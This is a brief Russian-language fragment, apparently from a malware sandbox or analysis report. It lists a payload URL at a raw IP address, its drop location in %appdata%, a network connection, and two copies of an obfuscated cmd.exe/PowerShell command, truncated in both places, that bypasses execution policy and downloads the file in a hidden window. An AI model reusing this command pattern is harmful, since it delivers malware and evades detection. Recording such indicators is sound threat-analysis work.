Техническая информация
- http://92.63.88.142/rei2uhae/infe.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POWER^sh^E^LL.E^xe -eXeC^UtIO^np^oL^iCY^ b^YPAs^s -^NopRofI^l^e -^WIn^doWStYLe ^H^idDEN^ (N^eW-o^B^jECT SYste^m^.n^eT.^W^Ebcl^i^Ent^).^dowNl^Oa^D^FILe('http://92.63.88.142/Rei2...
- '92.##.88.142':80
- '<SYSTEM32>\cmd.exe' /c "POWER^sh^E^LL.E^xe -eXeC^UtIO^np^oL^iCY^ b^YPAs^s -^NopRofI^l^e -^WIn^doWStYLe ^H^idDEN^ (N^eW-o^B^jECT SYste^m^.n^eT.^W^Ebcl^i^Ent^).^dowNl^Oa^D^FILe('http://92.63.88.142/Rei2...' (со скрытым окном)